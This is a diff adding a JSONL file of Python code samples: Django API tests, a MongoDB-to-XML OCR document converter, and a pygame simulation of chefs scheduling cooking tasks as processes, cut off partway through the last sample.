diff --git "a/4832.jsonl" "b/4832.jsonl"
new file mode 100644--- /dev/null
+++ "b/4832.jsonl"
@@ -0,0 +1,691 @@
+{"seq_id":"399097267","text":"import pytest\nfrom apexselftaught.apps.portfolio.tests.factories import FrameworkFactory, ProgrammingLanguageFactory\n\n\n@pytest.mark.django_db\ndef test_user_can_create_framework(authorized_client, base_url):\n language = ProgrammingLanguageFactory()\n framework = {\n \"framework\": {\n \"language\": language.id,\n \"name\": \"New Framework\",\n \"proficiency\": 8,\n \"is_primary\": True\n }\n }\n response = authorized_client.post(f'{base_url}frameworks', framework, format='json')\n assert response.status_code == 201\n\n\n@pytest.mark.django_db\ndef test_user_can_edit_existing_framework(authorized_client, base_url, user):\n framework = FrameworkFactory(user=user)\n edit_data = {\n \"framework\": {\n \"language\": framework.language.id,\n \"name\": \"New Framework\",\n \"proficiency\": 8,\n \"is_primary\": True\n }\n }\n response = authorized_client.put(f'{base_url}frameworks/{framework.id}', edit_data, format='json')\n assert response.status_code == 200\n\n\n@pytest.mark.django_db\ndef test_user_can_get_all_frameworks(authorized_client, base_url):\n batch = 3\n FrameworkFactory.create_batch(batch)\n response = authorized_client.get(f'{base_url}frameworks', format='json')\n assert response.status_code == 200\n\n\n@pytest.mark.django_db\ndef test_user_can_get_single_framework(authorized_client, base_url):\n framework = FrameworkFactory()\n response = authorized_client.get(f'{base_url}frameworks/{framework.id}')\n assert response.status_code == 200\n\n\n@pytest.mark.django_db\ndef test_user_can_delete_framework(authorized_client, base_url, user):\n frameworks = [FrameworkFactory(user=user) for _ in range(0, 3)]\n framework = frameworks[0]\n response = authorized_client.delete(f'{base_url}frameworks/{framework.id}', format='json')\n assert response.status_code == 200\n response2 = authorized_client.get(f'{base_url}frameworks/{framework.id}', format='json')\n assert response2.status_code == 404\n","sub_path":"apexselftaught/apps/portfolio/tests/test_framework.py","file_name":"test_framework.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"270391647","text":"import lxml.etree as etree\nimport json\nimport sys\nfrom os import listdir\nimport re\nfrom xml.dom.minidom import parseString\nimport ast\nimport binascii\nfrom pymongo import MongoClient\nimport xml.etree.ElementTree as ET\nimport ast\nimport pyxdameraulevenshtein as lev\nimport dicttoxml\n\n\n\n\nimport cv2\nimport numpy as np\nimport json\nimport math\nfrom copy import deepcopy\nfrom ocr_pattern_hypothesis.utils import frame_utils\nfrom ocr_pattern_hypothesis.frames.basic_frames import Word\nfrom ocr_pattern_hypothesis.frames.structure.engine import StructureEngine\nfrom ocr_pattern_hypothesis.frames.structure.text import TextLine\nimport time\nimport os\n\nmongo_ip=\"192.168.60.68\"\nclient_name=\"ami-test\"\n\n\"\"\"\nCreated by @amandubey on 22/01/19\n\"\"\"\n\n\n######################################################################################################################\n\nclass k():\n def __init__(self):\n self.key=0\n def get_key(self):\n self.key=self.key+1\n return self.key\n\ndelta=k()\n\nall_fields={}\nrelationship_pairs={}\n\n\n# This function unrolls the relations in reverse order and puts them in relationship_pairs\n#Using\ndef collect_children(page_id,parents):\n child_list=[]\n #print(\"Parents\",parents)\n for each_child in parents:\n #print(\"Each Child\",each_child)\n #If true field\n if each_child['field']:\n save_name=str(page_id+'_'+each_child['_id'])\n\n else:\n save_name=str(each_child['_id'])\n child_list.append(save_name)\n relationship_pairs[str(delta.get_key())]={'parent':save_name,'child':collect_children(page_id,each_child['children']),'is_link':not(each_child['field'])}\n\n #print('Child List',child_list)\n\n #print(\"*******\")\n\n #print(\"ReL PaIrS\", relationship_pairs)\n return child_list\n\n# Popping and structuring form relationship pairs\n#Using\ndef clean_relationship_pairs(relationship_pairs):\n parents_list=[]\n keys_poped=[]\n links_list=[]\n for k,v in relationship_pairs.items():\n #Put every new parent in parents_list\n if v['parent'] not in parents_list:\n parents_list.append(v['parent'])\n #Put every link in links_list\n if v['is_link']:\n links_list.append(str(1+parents_list.index(v['parent'])))\n else:\n #If already present,it is a child. So extend child list of parent\n indx = parents_list.index(v['parent'])\n relationship_pairs[str(1 + indx)]['child'].extend(v['child'])\n keys_poped.append(k)\n for k in keys_poped:\n relationship_pairs.pop(k)\n\n #print(\"Before cleaning\",relationship_pairs)\n relationship_pairs=clean_links(relationship_pairs,links_list)\n #print(\"Links List\",links_list)\n #print(\"After cleaning\",relationship_pairs)\n\n return relationship_pairs\n\n# Question????????????????????\ndef clean_links(relationship_pairs,links_list):\n #print(\"Rel pairs b4 cleaning\",relationship_pairs)\n for enum in links_list:\n for each_enum,val in relationship_pairs.items():\n if relationship_pairs[enum]['parent'] in val['child']:\n val['child'].extend(relationship_pairs[enum]['child'])\n val['child'].pop(val['child'].index(relationship_pairs[enum]['parent']))\n for k in links_list:\n relationship_pairs.pop(k)\n\n # print(\"Links List\",links_list)\n # print(\"Rel pairs after cleaning\", relationship_pairs)\n return relationship_pairs\n\n#Using\ndef collect_all_fileds(page_id,fields):\n for each_data in fields:\n each_data['children']=[]\n all_fields[page_id+'_'+each_data['_id']]=each_data\n\n\n#Using\ndef create_relation_fields(all_fields,relationship_pairs):\n poped_ids=[]\n field_list=[]\n for key_enum,tree_relation in relationship_pairs.items():\n for child_id in tree_relation['child']:\n all_fields[tree_relation['parent']]['children'].append(all_fields[child_id])\n poped_ids.append(child_id)\n #print()\n for popid in poped_ids:\n all_fields.pop(popid)\n\n for k,v in all_fields.items():\n field_list.append(v)\n return field_list\n\n\n##Using\ndef get_all_fields(mongo_ip,client_name,document_id):\n\n client = MongoClient(mongo_ip)\n db = client[client_name]\n relations = list(db.pageRelations.find({\"document_id\": document_id}))\n fields = list(db.fields.find({\"documentId\": document_id}))\n\n for enum,val in enumerate(relations):\n collect_children(val[\"page_id\"],val[\"relations\"])\n\n clean_relationship_pairs(relationship_pairs)\n for enum,val in enumerate(fields):\n collect_all_fileds(val[\"pageId\"],val['fields'])\n field_list=create_relation_fields(all_fields,relationship_pairs)\n #print(\"Field List\",field_list)\n\n return field_list\n\n\n# Helper function to extract specific attributes according to field type for xml string\n# for each parent and corresponding children and forming the xml structure\n#Using\ndef get_field_xml(field,xml_data,print_flag=False):\n\n label_and_value = ast.literal_eval(field['value'])\n\n if len(field['children']) > 0:\n for child in field['children']:\n b = ET.SubElement(xml_data, 'field')\n get_field_xml(child,b,print_flag=False)\n\n if field['type'] == \"Key-value pair\":\n value_word = label_and_value[1]['key']\n\n elif field['type'] == \"group_frame\" :\n if (len(label_and_value)==2) :\n value_word = label_and_value[1]['key']\n else:\n value_word = label_and_value[0]['key']\n\n else:\n value_word = label_and_value[0]['key']\n\n xml_data.set('value',value_word)\n xml_data.set('tag',field['tag'])\n # if print_flag:\n #\n # lis.append(ET.tostring(xml_data).decode('utf-8'))\n # lis.append(xml_data('utf-8'))\n\n\n\n return xml_data\n\n#Using\ndef format_fields_for_xml(all_Fields):\n all_field_xml_data=''\n print(\"AllFields\",all_Fields)\n for field in all_Fields:\n # Create proper xml string with parents and children in order for all relations present in all_fields\n root = ET.Element('field')\n al = ET.tostring(get_field_xml(field, root, print_flag=True))\n all_field_xml_data += al.decode(\"utf-8\")\n # all_field_xml_data+=get_field_xml(field)\n\n all_field_xml_data+=''\n\n return all_field_xml_data\n\n\n\n\n#######################################################################################################################\n\ndef get_page_coordinates_from_coordinates_data(coordinates_data_dict):\n \"\"\"\n converts x,y,width,height to top,left,bottom,right\n :param coordinates_data_dict: dictionary having x,y,width,height values\n :return: tuple in top,left,bottom,right format\n \"\"\"\n return (coordinates_data_dict['y'],coordinates_data_dict['x'],(coordinates_data_dict['y']\n +coordinates_data_dict['height']),(coordinates_data_dict['x']+coordinates_data_dict['width']))\n\ndef get_coordinates_data_from_page_coordinates(page_coordinates):\n \"\"\"\n converts top,left,bottom,right to x,y,width,height\n :param page_coordinates: list in top,left,bottom,right format\n :return: dictionary as x,y,width,height\n \"\"\"\n print(\"page_coordinates\",page_coordinates)\n return {'x':page_coordinates[1],'y':page_coordinates[0],'width':(page_coordinates[3]-page_coordinates[1]),\n 'height':(page_coordinates[2]-page_coordinates[0])}\n\ndef is_coordinates_overlapping(rect1, rect2):\n \"\"\"\n created by @amandubey on 13/11/18\n returns if two sets of coordinates are overlapping or not\n :param rect1: first set of coordinates\n :param rect2: second set of coordinates\n :return: True when two sets of coordinates are overlapping otherwise false\n \"\"\"\n left = rect2[2] < rect1[0]\n right = rect1[2] < rect2[0]\n bottom = rect2[3] < rect1[1]\n top = rect1[3] < rect2[1]\n if top or left or bottom or right:\n return False\n else: # rectangles intersect\n return True\n\n\ndef get_textlines(evidence,image):\n \"\"\"\n Gives all textlines\n Any change to reflect in all the data present should be here\n \"\"\"\n s_engine = StructureEngine((\n TextLine.generate,\n ))\n word_patches_dict = {}\n structures = []\n for each_evidence in evidence['words']:\n # print(\"txtline keys :\",each_evidence.keys())\n # print(each_evidence['coordinate']['y'])\n # print(each_evidence['coordinate']['x'])\n # print(each_evidence['coordinate']['width'])\n # print(each_evidence['coordinate']['height'])\n label_word = str(each_evidence['label'])\n\n coordinates = (each_evidence['coordinate']['y'],each_evidence['coordinate']['x'],(each_evidence['coordinate']['height'] + each_evidence['coordinate']['y']),(each_evidence['coordinate']['width']+each_evidence['coordinate']['x']))\n\n xx=re.findall(r'[a-zA-Z0-9-+=-_]+', label_word)\n\n if len(xx)<1:\n label_word=\" \"\n\n label_word=label_word.replace('\"',\"'\")\n word_patches_dict[coordinates] = label_word\n\n try:\n structures = s_engine.run(image, word_args=(word_patches_dict,))\n except IndexError:\n structures = []\n structures=structures.filter(TextLine)\n print('no. of textlines',len(structures))\n return structures\n\ndef textline_intersection(rect1,rect2):\n \"\"\"\n Get new coordinates if two blocks are overlapping\n :return: merged coordinates\n \"\"\"\n t = min((rect1[0], rect2[0]))\n l = min((rect1[1], rect2[1]))\n b = max((rect1[2], rect2[2]))\n r = max((rect1[3], rect2[3]))\n return [t, l,b, r]\n\n\ndef fetch_textline_xml_data(value_word,tag,text_root,label_word=\"\",has_label=False):\n \"\"\"\n\n :param value_word: value\n :param tag: tag\n :param label_word: label\n :param has_label: kv pair\n :param ends_here: child\n :param is_end_of_data: end of total text node block\n :return: formatted text node string\n \"\"\"\n\n if has_label:\n text_root.set('key', str(label_word))\n\n text_root.set('value', str(value_word))\n text_root.set('tag', str(tag))\n\n return ET\n\n\n\n\ndef fetch_textline_xml_data_with_children(value_word,tag,text_root) :\n\n text_root.set('value',value_word)\n text_root.set('tag',tag)\n\n return text_root\n\n#Using\n\n# Need to concentrate here\ndef create_textline_level_txtNodes(page_structure,tables_list,fields_list):\n finalised_page_structures=\"\"\n textline_coordinates=[0,0,0,0]\n for textline in page_structure:\n is_finalised_page_structures=True\n textline_coordinates[0] = (textline.coordinates[0][1])\n textline_coordinates[1] = (textline.coordinates[0][0])\n textline_coordinates[2] = (textline.coordinates[1][1])\n textline_coordinates[3] = (textline.coordinates[1][0])\n for each_table in tables_list:\n if is_coordinates_overlapping(textline_coordinates,get_page_coordinates_from_coordinates_data(each_table['coordinates'])):\n is_finalised_page_structures=False\n\n if is_finalised_page_structures:\n\n text_root = ET.Element('txtNode')\n already_has_field=False\n for each_field in fields_list:\n\n if is_coordinates_overlapping(textline_coordinates,get_page_coordinates_from_coordinates_data(each_field['coordinate'])):\n has_label=False\n label_and_value = ast.literal_eval(each_field['value'])\n value_word,label_word='',''\n if each_field['type']==\"Key-value pair\":\n has_label=True\n label_word = label_and_value[0]['key']\n value_word=label_and_value[1]['key']\n\n\n#######################################################\n # Added by Ayan\n elif each_field['type']==\"group_frame\":\n if(len(label_and_value)==2) :\n has_label = True\n label_word = label_and_value[0]['key']\n value_word = label_and_value[1]['key']\n else :\n value_word = label_and_value[0]['key']\n label_word=\"\"\n\n#######################################################\n\n elif each_field['type']==\"\": #Standalone\n value_word = label_and_value[0]['key']\n label_word=\"\"\n\n\n #If the particular field(each_field) exactly matches with the text line\n if not lev.normalized_damerau_levenshtein_distance(value_word,str(textline)):\n fps = fetch_textline_xml_data(value_word=value_word,tag=each_field['tag'],\n label_word=label_word,has_label=has_label, text_root=text_root)\n fps = fps.tostring(text_root).decode(\"utf-8\")\n finalised_page_structures+= fps\n already_has_field=True\n\n break\n\n else:\n if not already_has_field:\n # finalised_page_structures+=fetch_textline_xml_data_with_children(value_word=str(textline),tag=\"\",text_root=text_root)\n text_root = fetch_textline_xml_data_with_children(value_word=str(textline),tag=\"\",text_root=text_root)\n already_has_field=True\n #print(\"Already has field :\",each_field['tag'])\n b = ET.SubElement(text_root,'txtNode')\n fetch_textline_xml_data(value_word=value_word,tag=each_field['tag'],\n label_word=label_word,has_label=has_label, text_root=b)\n\n fps = ET.tostring(text_root).decode(\"utf-8\")\n finalised_page_structures+= fps\n\n #Logic if field not present\n if not already_has_field:\n fps = fetch_textline_xml_data(value_word=str(textline), tag=\"\", text_root=text_root)\n fps = fps.tostring(text_root).decode(\"utf-8\")\n finalised_page_structures += fps\n\n\n finalised_page_structures+=''\n return finalised_page_structures\n\ndef check_tag_key(data_dict):\n if 'tag' not in data_dict.keys():\n data_dict['tag']=['']\n return data_dict\n\ndef format_xml_tag_for_table(tags):\n return ','.join(tags)\n\ndef fetch_table_row_xml_data(inside_table_data,headers,type='row'):\n inside_table_xml=''\n for enum,each_itter_data in enumerate(inside_table_data):\n each_itter_data=check_tag_key(each_itter_data)\n if type=='row':\n inside_table_xml+=''\n inside_table_xml+=fetch_table_row_xml_data(each_itter_data['cells'],headers,type='column')\n inside_table_xml+=''\n elif type=='column':\n inside_table_xml+=''\n\n return inside_table_xml\n\ndef check_table_for_headers(first_row):\n headers=[]\n hasHeader=False\n if first_row['isHeader']:\n for cell in first_row['cells']:\n headers.append(cell['value'])\n hasHeader=True\n else:\n for cell in first_row['cells']:\n headers.append('')\n return hasHeader,headers\n\ndef create_txtNodes_for_table(all_tables_list):\n if len(all_tables_list)<1:\n return \"\"\n table_data_xml=''\n for each_table in all_tables_list:\n # print('#'*30)\n table_data_xml+='
'\n hasHeaders,headers=check_table_for_headers(each_table['tableRows'][0])\n if hasHeaders:\n table_data_xml+=fetch_table_row_xml_data(each_table['tableRows'][1:],headers)\n else:\n table_data_xml+=fetch_table_row_xml_data(each_table['tableRows'],headers)\n\n\n table_data_xml+='
'\n\n table_data_xml+=''\n # print(\"all tables\")\n # print(table_data_xml)\n\n return table_data_xml\n\n\ndef fetch_page_level_info(mongo_ip,client_name,document_id,image_path=\"/home/amandubey/Documents/\"):\n client = MongoClient(mongo_ip)\n db = client[client_name]\n # all_document_related_pages_info = list(db.pages.find({\"documentId\": document_id}))\n all_document_related_pages_info = list(db.pages.find({\"documentId\": document_id}).sort('pageNumber'))\n\n all_document_related_fields = list(db.fields.find({\"documentId\": document_id}).sort('pageNumber'))\n all_pages_xml=\"\"\n xml_list=[]\n for enum,each_page in enumerate(all_document_related_pages_info):\n each_page_xml=''\n\n for each_field in all_document_related_fields:\n if each_field['path']==each_page['path']:\n page_related_fields=each_field\n break\n # page_image=cv2.imread(image_path+document_id+'/'+each_page['path'])\n page_image=cv2.imread(\"/Users/ayanbask/Desktop/IDP/flower_image.jpg\")\n page_structure=get_textlines(each_page,page_image)\n each_page_xml +=create_textline_level_txtNodes(page_structure,page_related_fields['tables'],page_related_fields['fields'])\n each_page_xml+=create_txtNodes_for_table(page_related_fields['tables'])\n each_page_xml+=''\n all_pages_xml+=each_page_xml\n # for i in range(len(xml_list)-1,-1,-1):\n # all_pages_xml+=xml_list[i]\n all_pages_xml+=''\n # print(\"all page XML IS\")\n # print(all_pages_xml)\n return all_pages_xml\n\n########################################################################################################################\n\ndef combine_json_parse_xml( document_id):\n data_list = []\n data = {}\n # document_id=uploadpath.split('/')[-1]\n\n\n #final_data_xml -> Final structured xml string\n final_data_xml=''\n # Fetching all fields by document\n data['all_Fields']=get_all_fields(mongo_ip,client_name,document_id)\n # Cleaning the fields by extracting only required info\n final_data_xml+=format_fields_for_xml(data['all_Fields'])\n final_data_xml+=fetch_page_level_info(mongo_ip,client_name,document_id)\n final_data_xml+=''\n\n print('final_data_xml')\n print(final_data_xml)\n f=open(\"xml_data.xml\",'w')\n f.write(final_data_xml)\n f.close()\n\n # print(data)\n #\n # xml = dicttoxml.dicttoxml(data)\n # xml_decoded = xml.decode()\n # print(xml_decoded)\n # xml_bytes = bytes(parseString(xml_decoded).toprettyxml(indent=' ' * 4), 'utf-8')\n # save_info=\"/home/amandubey/Documents/All Output Images/ami xml data/\"\n # with open(save_info+str(len(os.listdir(save_info))) + \"_data.xml\", \"wb\") as fs:\n # fs.write(xml_bytes)\n\nif __name__ == '__main__':\n # a={'as':['wq','ew','2332','asad','lsakd']}\n # print(a['as'][2:])\n # exit()\n # uploadpath = sys.argv[1]\n # uploadpath = \"/home/amandubey/Downloads/5c530a120ed0a632bcaf797c/\"\n doc_id=\"5d427bc96f237378706564e4\"\n combine_json_parse_xml(doc_id)\n print(\"success\")\n\n# paragraphs_text = detect_paragraph(img, evidence, 1.5,False,2)","sub_path":"combine_json_ETree.py","file_name":"combine_json_ETree.py","file_ext":"py","file_size_in_byte":19425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"546425560","text":"import cola\nimport time\nfrom procesos import *\nimport recursos as rs\nimport queue\nimport threading\nimport numpy as np\nimport pygame\nfrom pygame.sprite import Sprite\nfrom pygame.locals import *\nimport util\nimport sys, pygame, util\nfrom receta import Receta\nfrom recursos import CuchillosIma\nfrom recursos import LicuadoraIma\nfrom recursos import HornoIma\nfrom pizarra import Pizarra\n\nsize = width, height = 900, 712\nscreen = pygame.display.set_mode(size)\n\nclass Procesador(threading.Thread):\n\tdef __init__(self,idProcesador,*args):\n\t\tthreading.Thread.__init__(self)\n\t\tself.idProcesador=idProcesador\n\t\tself.proceso=None\n\t\tself.lis=cola.Cola()\n\t\tself.ter=cola.Cola()\n\t\tself.blo=cola.Cola()\n\t\tself.sus=cola.Cola()\n\t\tself._args=args\n\t\tself.uso=True\n\t\tself.minIter=50\n\n\tdef __str__(self):\n\t\treturn str(self.idProcesador)\n\n\tdef run(self):\n\t\twhile self.uso:\n\t\t\tself.usarProcesador(*self._args)\n\n\tdef usarProcesador(self,q):\n\t\twhile not self.proceso==None or not q.empty() or not self.lis.es_vacia() or not self.sus.es_vacia() or not self.blo.es_vacia() or self.minIter>0:\n\t\t\ttime.sleep(2)\n\t\t\tself.minIter-=1\n\t\t\tif not q.empty(): self.asignar(q.get())\n\t\t\tself.lis.ordenar()\n\t\t\tif not self.lis.es_vacia() and self.proceso==None:\n\t\t\t\tposible=self.lis.desencolar()\n\t\t\t\tif posible.recurso.libre:\n\t\t\t\t\tself.ocupado=True\n\t\t\t\t\tself.proceso=posible\n\t\t\t\t\tself.proceso.recurso.utilizar()\n\t\t\t\t\tself.proceso.estado=3\n\t\t\t\telse:\n\t\t\t\t\tposible.bloquear()\n\t\t\t\t\tself.blo.encolar(posible)\n\t\t\telif not self.lis.es_vacia() and not self.proceso==None:\n\t\t\t\tposible=self.lis.desencolar()\n\t\t\t\tif self.proceso.t>posible.t and posible.recurso.libre:\n\t\t\t\t\tself.proceso.suspender()\n\t\t\t\t\tself.sus.encolar(self.proceso)\n\t\t\t\t\tself.proceso=posible\n\t\t\t\t\tself.proceso.recurso.utilizar()\n\t\t\t\telse:\n\t\t\t\t\tself.lis.encolar(posible)\n\n\t\t\tself.contarColaBlo()\n\t\t\tself.contarColaLis()\n\t\t\tself.revisarColaSus()\n\t\t\tself.revisarColaBlo()\n\n\t\t\tif not self.proceso==None:\n\t\t\t\tself.proceso.procesar()\n\t\t\t\tif self.proceso.t==0:\n\t\t\t\t\tself.proceso.recurso.liberar()\n\t\t\t\t\tprint(\"\\nterminando proceso\",self.proceso,\"en el procesador\",self,\",sus\",self.proceso.sus,\",lis\",self.proceso.lis,\",blo\",self.proceso.blo,\",zona critica\",self.proceso.zc)\n\t\t\t\t\tself.proceso.estado=4\n\t\t\t\t\tself.ter.encolar(self.proceso)\n\t\t\t\t\tself.proceso=None\n\t\t\t\t\tq.task_done()\n\n\t\tprint(\"termino el procesador\",self,\"lista de tareas completadas en este procesador:\")\n\t\tfor i in range(self.ter.tam):\n\t\t\tprint(self.ter.desencolar())\n\t\tself.uso=False\n\n\tdef revisarColaSus(self):\n\t\ttam = self.sus.tam\n\t\tfor i in range(tam):\n\t\t\tn=self.sus.desencolar()\n\t\t\tn.tr-=1\n\t\t\tn.sus+=1\n\t\t\tif n.tr==0:\n\t\t\t\tself.asignar(n)\n\t\t\t\tprint(\"\\nse saco el proceso\",n,\"de la cola de suspendidos y entro a la cola de listo\")\n\t\t\telse:\n\t\t\t\tself.sus.encolar(n)\n\n\tdef revisarColaBlo(self):\n\t\tfor i in range(self.blo.tam):\n\t\t\tposible=self.blo.desencolar()\n\t\t\tif posible.recurso.libre:\n\t\t\t\tself.asignar(posible)\n\t\t\t\tprint(\"\\nse saco el proceso\",posible,\" de la cola de bloqueados y entro en la cola de listos\")\n\t\t\telse:\n\t\t\t\tself.blo.encolar(posible)\n\n\tdef contarColaLis(self):\n\t\ttam = self.lis.tam\n\n\t\tfor i in range(tam):\n\t\t\tn=self.lis.desencolar()\n\t\t\tn.lis+=1\n\t\t\tself.lis.encolar(n)\n\n\n\tdef contarColaBlo(self):\n\t\ttam = self.blo.tam\n\t\tfor i in range(self.blo.tam):\n\t\t\tn=self.blo.desencolar()\n\t\t\tn.blo+=1\n\t\t\tself.blo.encolar(n)\n\n\tdef asignar(self,proceso):\n\t\tproceso.estado=0\n\t\tself.lis.encolar(proceso)\n\nclass cliente:\n\tdef __init__(self):\n\t\tself.numPo=0\n\t\tself.numMa=0\n\t\tself.numEn=0\n\n\t\tself.recursos=[rs.Horno(),rs.Cuchillos(),rs.Licuadora()]\n\t\tself.cola1=queue.Queue()\n\t\tself.cola2=queue.Queue()\n\t\tself.cola3=queue.Queue()\n\n\t\tself.colaProcesadores=queue.Queue()\n\t\tself.procesador1=Chef((width-900,height),1,self.cola1)\n\t\tself.procesador2=Chef((width-700,height),2,self.cola2)\n\t\tself.procesador3=Chef((width-500,height),3,self.cola3)\n\n\t\tpygame.init()\n\t\tpygame.mixer.init()\n\n\t\tself.fondo = pygame.image.load(\"imagenes/cocina.png\")\n\t\tself.intro = pygame.image.load(\"imagenes/intro.png\")\n\t\tself.fondorect = self.fondo.get_rect()\n\t\tself.introrect = self.intro.get_rect()\n\n\t\tpygame.display.set_caption( \"Chef Race (Universidad Distrital)\" )\n\t\tself.pizarra = pygame.image.load(\"imagenes/pizarra.png\")\n\t\tself.sInicio = util.cargar_sonido('sonidos/inicio.wav')\n\t\tself.sHorno = util.cargar_sonido('sonidos/horno.wav')\n\t\tself.sCuchillo = util.cargar_sonido('sonidos/cuchillo.wav')\n\t\tself.sLicuadora = util.cargar_sonido('sonidos/licuadora.wav')\n\t\tself.sPrincipal = util.cargar_sonido('sonidos/principal.wav')\n\n\t\tself.pizarra1 = Pizarra((width-900,height))\n\t\tself.pizarra2 = Pizarra((width-700,height))\n\t\tself.pizarra3 = Pizarra((width-500,height))\n\t\tself.receta1 = Receta((width,height))\n\t\tself.receta2 = Receta((width+200,height))\n\t\tself.receta3 = Receta((width+400,height))\n\n\t\tself.comida1 = PolloConPapas(000,self.recursos[0],size)\n\t\tself.comida2 = Ensalada(111,self.recursos[1],size)\n\t\tself.comida3 = Malteada(222,self.recursos[2],size)\n\n\t\tself.listaChefs = [self.procesador1, self.procesador2, self.procesador3]\n\t\tself.listaPizarras = [self.pizarra1, self.pizarra2, self.pizarra3]\n\t\tself.listaRecetas = [self.receta1, self.receta2, self.receta3]\n\t\tself.listaComida = [self.comida1, self.comida2, self.comida3]\n\t\tself.cuchillos = CuchillosIma(size)\n\t\tself.licuadora = LicuadoraIma(size)\n\t\tself.horno = HornoIma(size)\n\n\t\tself.reloj = pygame.time.Clock()\n\t\tself.fuente1 = pygame.font.Font(None,70)\n\t\tself.fuente2 = pygame.font.Font(None,25)\n\t\tself.textoBienvenida = self.fuente1.render(\"Bienvenido a Chef Race UD\", 1, (255,255,255))\n\t\tself.textoAutor1 = self.fuente2.render(\"Marlon Arias\", 1, (0,0,0))\n\t\tself.textoAutor2 = self.fuente2.render(\"David Amado\", 1, (0,0,0))\n\t\tself.textoAutor3 = self.fuente2.render(\"Realizado por:\", 1, (0,0,0))\n\n\tdef iniciar(self):\n\n\t\tself.sInicio.play()\n\t\taux = 3\n\n\t\twhile aux > 0:\n\t\t\tscreen.blit(self.intro, self.introrect)\n\t\t\tscreen.blit(self.textoAutor1,(width-170,height-680))\n\t\t\tscreen.blit(self.textoAutor2,(width-170,height-660))\n\t\t\tscreen.blit(self.textoAutor3,(width-170,height-700))\n\t\t\tscreen.blit(self.textoBienvenida,((width-880, (height/2)+30)))\n\t\t\tpygame.display.update()\n\t\t\ttime.sleep(1)\n\t\t\taux=aux-1\n\n\t\tself.sPrincipal.play(1)\n\n\t\tself.procesador1.start()\n\t\tself.procesador2.start()\n\t\tself.procesador3.start()\n\t\tself.hiloAnimacion = threading.Thread(name='Animacion', target = self.pintar)\n\t\tself.hiloEventos = threading.Thread(name='Animacion', target = self.capturarEventos)\n\t\t#self.hiloEventos.daemon=True\n\t\tself.hiloEventos.start()\n\t\tself.hiloAnimacion.daemon=True\n\t\tself.hiloAnimacion.start()\n\t\t\n\t\tself.cola1.join()\n\t\tself.cola2.join()\n\t\tself.cola3.join()\n\t\tself.hiloAnimacion.join()\n\t\tself.hiloEventos.join()\n\n\tdef capturarEventos(self):\n\t\twhile self.procesador1.uso or self.procesador2.uso or self.procesador3.uso:\n\t\t\tfor event in pygame.event.get():\n\n\t\t\t\tif event.type == pygame.QUIT:\n\t\t\t\t\tsys.exit()\n\n\t\t\t\tif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\t\tprint(\"Evento ratonBtn capturado\")\n\t\t\t\t\tfor x in range(700, 760):\n\t\t\t\t\t\tfor y in range(282, 342):\n\t\t\t\t\t\t\tproceso = Malteada(self.numMa,self.recursos[2],size)\n\t\t\t\t\t\t\tself.numMa+=1\n\t\t\t\t\t\t\testado=\"trabajandoLicuadora1\"\n\t\t\t\t\t\t\tif event.button == 1 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola1.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador1.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra1.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click izq\")\n\t\t\t\t\t\t\telif event.button == 2 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola2.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador2.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra2.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click cent\")\n\t\t\t\t\t\t\telif event.button == 3 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola3.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador3.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra3.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click der\")\n\n\t\t\t\t\tfor x in range(700, 760):\n\t\t\t\t\t\tfor y in range(27, 87):\n\t\t\t\t\t\t\tproceso=PolloConPapas(self.numPo,self.recursos[0],size)\n\t\t\t\t\t\t\tself.numPo+=1\n\t\t\t\t\t\t\testado=\"trabajandoHorno1\"\n\t\t\t\t\t\t\tif event.button == 1 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola1.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador1.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra1.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click izq\")\n\t\t\t\t\t\t\telif event.button == 2 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola2.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador2.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra2.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click cent\")\n\t\t\t\t\t\t\telif event.button == 3 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola3.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador3.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra3.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click der\")\n\n\t\t\t\t\tfor x in range(700, 750):\n\t\t\t\t\t\tfor y in range(137, 197):\n\t\t\t\t\t\t\tproceso=Ensalada(self.numEn,self.recursos[1],size)\n\t\t\t\t\t\t\tself.numEn+=1\n\t\t\t\t\t\t\testado=\"trabajandoCuchillo1\"\n\t\t\t\t\t\t\tif event.button == 1 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola1.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador1.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra1.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click izq\")\n\t\t\t\t\t\t\telif event.button == 2 and event.pos == (x, y):\n\t\t\t\t\t\t\t\tself.cola2.put(proceso)\n\t\t\t\t\t\t\t\tself.procesador2.estado=estado\n\t\t\t\t\t\t\t\tself.pizarra2.arregloRecetas.append(proceso)\n\t\t\t\t\t\t\t\tprint(\"pico el click cent\")\n\t\t\t\t\t\t\telif event.button == 3 and event.pos == (x, 